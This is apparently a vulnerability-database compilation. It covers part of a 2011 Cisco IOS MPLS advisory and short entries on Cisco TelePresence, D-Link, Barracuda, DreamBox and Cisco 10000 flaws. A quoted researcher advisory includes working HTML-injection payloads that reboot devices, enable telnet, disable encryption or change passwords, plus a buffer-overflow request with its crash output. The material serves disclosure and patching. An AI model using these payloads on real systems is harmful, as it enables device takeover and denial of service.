| |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXF | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXG | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | | | Vulnerable; contact | | | | your support | | | | organization per the | | 12.2IXH | Not vulnerable | instructions in the | | | | Obtaining Fixed | | | | Software section of | | | | this advisory. | |------------+-----------------------+-----------------------| | 12.2JA | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2JK | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2MB | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | 12.2MC | Not vulnerable | Vulnerable; first | | | | fixed in Release 12.4 | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2MRA | Not vulnerable | fixed in Release | | | | 12.2SRD | |------------+-----------------------+-----------------------| | 12.2MRB | Not vulnerable | 12.2(33)MRB5 | |------------+-----------------------+-----------------------| | | | Releases prior to | | | | 12.2(30)S are | | | | vulnerable; Releases | | 12.2S | Not vulnerable | 12.2(30)S and later | | | | are not vulnerable. 
| | | | First fixed in | | | | Release 12.2SB | |------------+-----------------------+-----------------------| | | | 12.2(31)SB20 | | 12.2SB | Not vulnerable | | | | | 12.2(33)SB10 | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SBC | Not vulnerable | fixed in Release | | | | 12.2SB | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SCA | Not vulnerable | fixed in Release | | | | 12.2SCC | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SCB | Not vulnerable | fixed in Release | | | | 12.2SCC | |------------+-----------------------+-----------------------| | 12.2SCC | Not vulnerable | 12.2(33)SCC7 | |------------+-----------------------+-----------------------| | 12.2SCD | Not vulnerable | 12.2(33)SCD6 | |------------+-----------------------+-----------------------| | | | 12.2(33)SCE1 | | 12.2SCE | Not vulnerable | | | | | 12.2(33)SCE2 | |------------+-----------------------+-----------------------| | 12.2SCF | Not vulnerable | Not vulnerable | |------------+-----------------------+-----------------------| | | | 12.2(55)SE3 | | 12.2SE | Not vulnerable | | | | | 12.2(58)SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SEA | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SEB | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SEC | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SED | Not vulnerable | fixed in Release | | | | 12.2SE | |------------+-----------------------+-----------------------| | | | Vulnerable; first | | 12.2SEE | Not vulnerable | fixed in Release | | | | 12.2SE | 
| 12.2SEF | Not vulnerable | Vulnerable; first fixed in Release 12.2SE |
| 12.2SEG | Not vulnerable | Releases prior to 12.2(25)SEG4 are vulnerable; Releases 12.2(25)SEG4 and later are not vulnerable. First fixed in Release 12.2EX |
| 12.2SG | Not vulnerable | Releases prior to 12.2(53)SG4 are vulnerable; Releases 12.2(53)SG4 and later are not vulnerable. |
| 12.2SGA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SL | Not vulnerable | Not vulnerable |
| 12.2SM | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SO | Not vulnerable | Not vulnerable |
| 12.2SQ | Not vulnerable | 12.2(50)SQ3 |
| 12.2SRA | Not vulnerable | Vulnerable; first fixed in Release 12.2SRD |
| 12.2SRB | Not vulnerable | Vulnerable; first fixed in Release 12.2SRD |
| 12.2SRC | Not vulnerable | Vulnerable; first fixed in Release 12.2SRD |
| 12.2SRD | Not vulnerable | 12.2(33)SRD6 |
| 12.2SRE | 12.2(33)SRE4 | 12.2(33)SRE4 |
| 12.2STE | Not vulnerable | Not vulnerable |
| 12.2SU | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2SV | Not vulnerable | Releases prior to 12.2(29a)SV are vulnerable; Releases 12.2(29a)SV and later are not vulnerable. Migrate to any release in 12.2SVD |
| 12.2SVA | Not vulnerable | Not vulnerable |
| 12.2SVC | Not vulnerable | Not vulnerable |
| 12.2SVD | Not vulnerable | Not vulnerable |
| 12.2SVE | Not vulnerable | Not vulnerable |
| 12.2SW | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2SX | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2SXA | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2SXB | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2SXD | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2SXE | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2SXF | Not vulnerable | 12.2(18)SXF17b |
| 12.2SXH | Not vulnerable | 12.2(33)SXH8a |
| 12.2SXI | Not vulnerable | 12.2(33)SXI6 |
| 12.2SXJ | Not vulnerable | Not vulnerable |
| 12.2SY | Not vulnerable | 12.2(50)SY |
| 12.2SZ | Not vulnerable | Vulnerable; first fixed in Release 12.2SB |
| 12.2T | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2TPC | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2XA | Not vulnerable | Not vulnerable |
| 12.2XB | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2XC | Not vulnerable | Not vulnerable |
| 12.2XD | Not vulnerable | Not vulnerable |
| 12.2XE | Not vulnerable | Not vulnerable |
| 12.2XF | Not vulnerable | Not vulnerable |
| 12.2XG | Not vulnerable | Not vulnerable |
| 12.2XH | Not vulnerable | Not vulnerable |
| 12.2XI | Not vulnerable | Not vulnerable |
| 12.2XJ | Not vulnerable | Not vulnerable |
| 12.2XK | Not vulnerable | Not vulnerable |
| 12.2XL | Not vulnerable | Not vulnerable |
| 12.2XM | Not vulnerable | Not vulnerable |
| 12.2XN | Not vulnerable | Not vulnerable |
| 12.2XNA | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XNB | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XNC | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XND | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XNE | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XNF | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 12.2XO | Not vulnerable | Releases prior to 12.2(54)XO are vulnerable; Releases 12.2(54)XO and later are not vulnerable. |
| 12.2XQ | Not vulnerable | Not vulnerable |
| 12.2XR | Not vulnerable | Not vulnerable |
| 12.2XS | Not vulnerable | Not vulnerable |
| 12.2XT | Not vulnerable | Not vulnerable |
| 12.2XU | Not vulnerable | Not vulnerable |
| 12.2XV | Not vulnerable | Not vulnerable |
| 12.2XW | Not vulnerable | Not vulnerable |
| 12.2YA | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2YB | Not vulnerable | Not vulnerable |
| 12.2YC | Not vulnerable | Not vulnerable |
| 12.2YD | Not vulnerable | Not vulnerable |
| 12.2YE | Not vulnerable | Not vulnerable |
| 12.2YF | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YG | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YH | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YJ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YK | Not vulnerable | Not vulnerable |
| 12.2YL | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YM | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2YN | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YO | Not vulnerable | Not vulnerable |
| 12.2YP | Not vulnerable | Not vulnerable |
| 12.2YQ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YR | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YS | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YT | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YU | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YV | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YW | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YX | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2YZ | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZA | Not vulnerable | Vulnerable; first fixed in Release 12.2SXF |
| 12.2ZB | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZC | Not vulnerable | Not vulnerable |
| 12.2ZD | Not vulnerable | Not vulnerable |
| 12.2ZE | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2ZF | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2ZG | Not vulnerable | Not vulnerable |
| 12.2ZH | Not vulnerable | Vulnerable; first fixed in Release 12.4 |
| 12.2ZJ | Not vulnerable | Not vulnerable |
| 12.2ZL | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZP | Not vulnerable | Not vulnerable |
| 12.2ZU | Not vulnerable | Vulnerable; first fixed in Release 12.2SXH |
| 12.2ZX | Not vulnerable | Not vulnerable |
| 12.2ZY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 12.2ZYA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
|------------+-----------------------+-----------------------|
| Affected 12.3-Based Releases | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.3-based releases |
|------------------------------------------------------------|
| Affected 12.4-Based Releases | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 12.4-based releases |
|------------------------------------------------------------|
| Affected 15.0-Based Releases | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------+-----------------------+-----------------------|
| 15.0M | 15.0(1)M7 | 15.0(1)M7 |
| 15.0MR | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0MRA | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0S | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 15.0SA | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.0SE | Not vulnerable | Not vulnerable |
| 15.0SG | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 15.0XA | Vulnerable; first fixed in Release 15.1T | Vulnerable; first fixed in Release 15.1T |
| 15.0XO | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
|------------+-----------------------+-----------------------|
| Affected 15.1-Based Releases | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------+-----------------------+-----------------------|
| 15.1EY | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.1GC | Vulnerable; first fixed in Release 15.1T | Vulnerable; first fixed in Release 15.1T |
| 15.1M | 15.1(4)M1 | 15.1(4)M2; Available on 30-SEP-11 |
| 15.1MR | Not vulnerable | Vulnerable; contact your support organization per the instructions in the Obtaining Fixed Software section of this advisory. |
| 15.1S | See Cisco IOS-XE Software Availability | See Cisco IOS-XE Software Availability |
| 15.1T | 15.1(1)T4; Available on 09-DEC-11, 15.1(2)T4, 15.1(3)T2 | 15.1(2)T4, 15.1(1)T4 on 8-Dec-2011 |
| 15.1XB | Vulnerable; first fixed in Release 15.1T | Vulnerable; first fixed in Release 15.1T |
|------------+-----------------------+-----------------------|
| Affected 15.2-Based Releases | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|------------------------------------------------------------|
| There are no affected 15.2-based releases |
+------------------------------------------------------------+

Cisco IOS XE Software
+--------------------

Cisco IOS XE Software is affected by the vulnerability disclosed in this document.
+------------------------------------------------------------+
| Cisco IOS XE Release | First Fixed Release For This Advisory | First Fixed Release for All Advisories in the September 2011 Bundled Publication |
|----------+----------------+--------------------------------|
| 2.1.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 2.2.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 2.3.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 2.4.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 2.5.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 2.6.x | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 3.1.xS | 3.1.4S | Vulnerable; migrate to 3.3.2S or later |
| 3.1.xSG | Not vulnerable | Vulnerable; migrate to 3.2.0SG or later |
| 3.2.xS | Vulnerable; migrate to 3.3.2S or later | Vulnerable; migrate to 3.3.2S or later |
| 3.2.xSG | Not vulnerable | Not vulnerable |
| 3.3.xS | 3.3.2S | 3.3.2S |
| 3.4.xS | Not vulnerable | Not vulnerable |
+------------------------------------------------------------+

For mapping of Cisco IOS XE to Cisco IOS releases, please refer to the Cisco IOS XE 2 Release Notes, Cisco IOS XE 3S Release Notes, and Cisco IOS XE 3SG Release Notes.

Cisco IOS XR Software
+--------------------

Cisco IOS XR Software is not affected by the vulnerability disclosed in this document. Cisco IOS XR Software is not affected by any of the vulnerabilities in the September 2011 bundled publication.

Workarounds
===========

For both vulnerabilities the following workaround applies:

Disabling MPLS TTL Propagation
+-----------------------------

Disabling MPLS TTL propagation will prevent exploitation of these vulnerabilities. MPLS TTL propagation will have to be disabled on all PE routers in the MPLS domain. To disable MPLS TTL propagation, enter the global configuration command "no mpls ip propagate-ttl". If only "no mpls ip propagate-ttl forward" is configured, the vulnerabilities could still be exploited from within the MPLS domain.

For more information about the MPLS TTL propagation command, refer to the configuration guide at: http://www.cisco.com/en/US/docs/ios/mpls/command/reference/mp_m1.html#wp1013846

Obtaining Fixed Software
========================

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased.
By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts
+-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations
+------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts
+----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  * +1 800 553 2447 (toll free from within North America)
  * +1 408 526 7209 (toll call from anywhere in the world)
  * e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements
=====================================

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were discovered when handling customer support calls.

Status of this Notice: FINAL
============================

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution
============

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6mpls.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.
  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History
================

+------------------------------------------------------------+
| Revision 1.0 | 2011-September-28 | Initial public release |
+------------------------------------------------------------+

Cisco Security Procedures
=========================

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.

Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
VAR-201109-0074 CVE-2011-2543 Cisco Telepresence System Integrator C of cuil Component buffer overflow vulnerability

Related entries in the VARIoT exploits database: VAR-E-201108-0204
CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
Buffer overflow in the cuil component in Cisco Telepresence System Integrator C Series 4.x before TC4.2.0 allows remote authenticated users to cause a denial of service (endpoint reboot or process crash) or possibly execute arbitrary code via a long location parameter to the getxml program, aka Bug ID CSCtq46496. Cisco Telepresence System Integrator C of cuil The component contains a buffer overflow vulnerability. Cisco TelePresence Endpoint is prone to memory-corruption and HTML-injection vulnerabilities. An attacker can exploit the HTML-injection issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. An attacker can exploit the memory-corruption issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. ---------------------------------------------------------------------- Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool. 
TITLE: TANDBERG C Series Endpoints Script Insertion and Denial of Service Vulnerabilities
SECUNIA ADVISORY ID: SA46057
VERIFY ADVISORY: http://secunia.com/advisories/46057/
RELEASE DATE: 2011-09-22

DESCRIPTION: Two vulnerabilities have been reported in TANDBERG C Series Endpoints, which can be exploited by malicious users to conduct script insertion attacks and cause a DoS (Denial of Service).

1) Input passed as the Call ID when calling another endpoint is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed on an affected device when the malicious data is being viewed.

2) An error in the tshell application can be exploited to dereference an invalid memory address via overly long strings passed via the "location" parameter to the getXML script.

The vulnerabilities are reported in version 4.1.2 and prior.

SOLUTION: Update to version 4.2.0, which fixes vulnerability #2. Filter malicious characters and character sequences using a proxy.

ORIGINAL ADVISORY: http://www.senseofsecurity.com.au/advisories/SOS-11-010

Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco
Affected versions. C <= TC4.1.2, MXP <= F9.1
Severity Rating. Low - Medium
Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service.
Solution Status. Vendor patch
References.
1. CVE-2011-2544 (CSCtq46488)
2. CVE-2011-2543 (CSCtq46496)
3. CVE-2011-2577 (CSCtq46500)

Details.
Cisco TelePresence is an umbrella term for Video Conferencing Hardware and Software, Infrastructure and Endpoints. The C & MXP Series are the Endpoints used on desks or in boardrooms to provide users with a termination point for Video Conferencing.

1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488):

Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to a HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and failure to correctly validate user input.

Examples (MXP):

Rebooting the system:
<IMG SRC="/reboot&Yes=please">

The attacker may also choose to change passwords in the system, disable encryption or enable telnet:
<IMG SRC=/html_select_status?reload=other.ssi&telnet=On>
<IMG SRC=/html_select_status?reload=security.ssi&/Configuration/
Conference/Encryption/Mode=Off&/Configuration/SystemUnit/Password=test>

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):

Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for setting and getting configuration. Example syntax is:

http://ip/getxml?location=/Configuration/Video

The request is sent to a locally listening shell (tshell). This is the case for all requests relating to performing an action on the system (e.g. config get or set). The shell then sends the input to the "main" application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform length checking on the user supplied input before passing it to the tshell. Furthermore, there is no length checking performed in the tshell and no bounds checking performed in the main application where the parameter is consumed. As such, it is possible to send input that exceeds the size of the receiving buffer, subsequently causing an invalid address to be read. This causes a reboot on the Endpoints. The VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but it will restart the process itself which drops all calls.

Proof of Concept:

GET /wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\n
Host: 192.168.6.99\r\n\r\n"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037 0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896 0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005 00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):

Cisco TelePresence Endpoints utilise SIP for the call setup protocol. Sending a SIP INVITE with a 4x8 a"s in the MAC Address field and the receive field causes the system to reboot.

Proof of Concept:

MXP:
Exception 0x1100 : Data TLB load miss
Active task FsmMain FSM process : SipTrnsp(0)
FSM message : SipTrnsp_Send_Msg_Req from SipTrnsp(0)
Data TLB miss (DMISS) : 0x00000000 (illegal addr. accessed)

Solution.
Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by.
David Klein, Sense of Security Labs.

The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

Restrict access to trusted users only
VAR-201109-0075 CVE-2011-2544 Cross-site scripting vulnerability in the web interface of Cisco TelePresence System MXP

Related entries in the VARIoT exploits database: VAR-E-201108-0204
CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Cross-site scripting (XSS) vulnerability in the web interface in Cisco TelePresence System MXP Series F9.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via a crafted Call ID, as demonstrated by resultant cross-site request forgery (CSRF) attacks that change passwords or cause a denial of service, aka Bug ID CSCtq46488. The web interface of Cisco TelePresence System MXP contains a cross-site scripting vulnerability. This issue is tracked as Bug ID CSCtq46488. A remote authenticated user may inject arbitrary web script or HTML via a crafted Call ID. Cisco TelePresence Endpoint is prone to memory-corruption and HTML-injection vulnerabilities. An attacker can exploit the HTML-injection issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. An attacker can exploit the memory-corruption issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. The TelePresence solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. Steal cookie authentication configuration.
VAR-201210-0554 CVE-2012-1308 Cross-site request forgery vulnerability in redpass.cgi in D-Link DSL-2640B Firmware

Related entries in the VARIoT exploits database: VAR-E-201202-0295
CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cross-site request forgery (CSRF) vulnerability in redpass.cgi in D-Link DSL-2640B Firmware EU_4.00 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysPassword parameter. D-Link is Taiwan's first publicly traded online company, marketing computer network products under its own D-Link brand in more than 100 countries around the world. Other attacks are also possible. The D-Link DSL-2640B router is prone to a cross-site request-forgery vulnerability. This issue affects D-Link DSL-2640B. D-Link is a network company founded by Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment.
VAR-201210-0410 CVE-2012-5316 Barracuda Spam & Virus Firewall 600 Firmware cross-site scripting vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam & Virus Firewall 600 Firmware 4.0.1.009 and earlier allow remote authenticated users to inject arbitrary web script or HTML via (1) Troubleshooting in the Trace route Device module or (2) LDAP Username in the LDAP Configuration module. Barracuda Spam & Virus WAF 600 is prone to multiple unspecified HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. The vulnerability stems from improper filtering of user-supplied input before it is used to dynamically generate content.
VAR-201112-0306 CVE-2011-4716 DreamBox DM800 Vulnerable to directory traversal CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in file in DreamBox DM800 1.6rc3, 1.5rc1, and earlier allows remote attackers to read arbitrary files via the file parameter. DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input. Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. DreamBox DM800 versions 1.5rc1 and prior are vulnerable. Dreambox is a Linux-based digital TV set-top box produced by Dream Multimedia in Germany
VAR-201110-0245 CVE-2011-3270 Denial-of-service (DoS) vulnerability in Cisco IOS on Cisco 10000 series routers CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Unspecified vulnerability in Cisco IOS 12.2SB before 12.2(33)SB10 and 15.0S before 15.0(1)S3a on Cisco 10000 series routers allows remote attackers to cause a denial of service (device reload) via a sequence of crafted ICMP packets, aka Bug ID CSCtk62453. Successful exploits will cause an affected device to reload or hang, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCtk62453.

Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are also available. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110928-c10k.shtml.

Note: The September 28, 2011, Cisco IOS Software Security Advisory bundled publication includes ten Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the September 2011 Bundled Publication.

To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the "show version" command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to "Cisco Internetwork Operating System Software" or "Cisco IOS Software." The image name displays in parentheses, followed by "Version" and the Cisco IOS Software release name. Other Cisco devices do not have the "show version" command or may provide different output.

